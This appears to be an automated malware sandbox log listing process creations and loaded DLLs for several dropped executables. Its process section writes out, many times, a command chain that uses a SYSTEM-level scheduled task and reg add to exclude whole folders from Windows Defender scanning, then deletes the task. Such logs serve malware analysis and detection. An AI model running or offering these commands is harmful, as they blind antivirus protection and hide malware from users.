Source: C:\Users\user\Documents\qWXt7a.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\qWXt7a.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\qWXt7a.exe	Process created: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe "C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe"
Source: unknown	Process created: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe "C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe"
Source: unknown	Process created: C:\Program Files (x86)\W9sgnm2c\aPkMBkaA.exe "C:\Program Files (x86)\W9sgnm2c\aPkMBkaA.exe"
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c echo.>c:\xxxx.ini
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe "C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe"
Source: unknown	Process created: C:\Program Files (x86)\W9sgnm2c\aPkMBkaA.exe "C:\Program Files (x86)\W9sgnm2c\aPkMBkaA.exe"
Source: C:\Users\user\Documents\qWXt7a.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Process created: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe "C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c echo.>c:\xxxx.ini	Jump to behavior

Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: pid.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: hid.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: vselog.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: vselog.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: twext.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: cscui.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: workfoldersshell.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: starttiledata.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: usermgrproxy.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: acppage.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Section loaded: tbcore3u.dll	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Section loaded: devenum.dll	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Section loaded: msdmo.dll	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Section loaded: tbcore3u.dll
Source: C:\Program Files (x86)\W9sgnm2c\aPkMBkaA.exe	Section loaded: apphelp.dll
Source: C:\Program Files (x86)\W9sgnm2c\aPkMBkaA.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\W9sgnm2c\aPkMBkaA.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\W9sgnm2c\aPkMBkaA.exe	Section loaded: tbcore3u.dll
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Section loaded: tbcore3u.dll
Source: C:\Program Files (x86)\W9sgnm2c\aPkMBkaA.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\W9sgnm2c\aPkMBkaA.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\W9sgnm2c\aPkMBkaA.exe	Section loaded: tbcore3u.dll

Source: C:\Users\user\Desktop\0000000000000000.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Documents\qWXt7a.exe

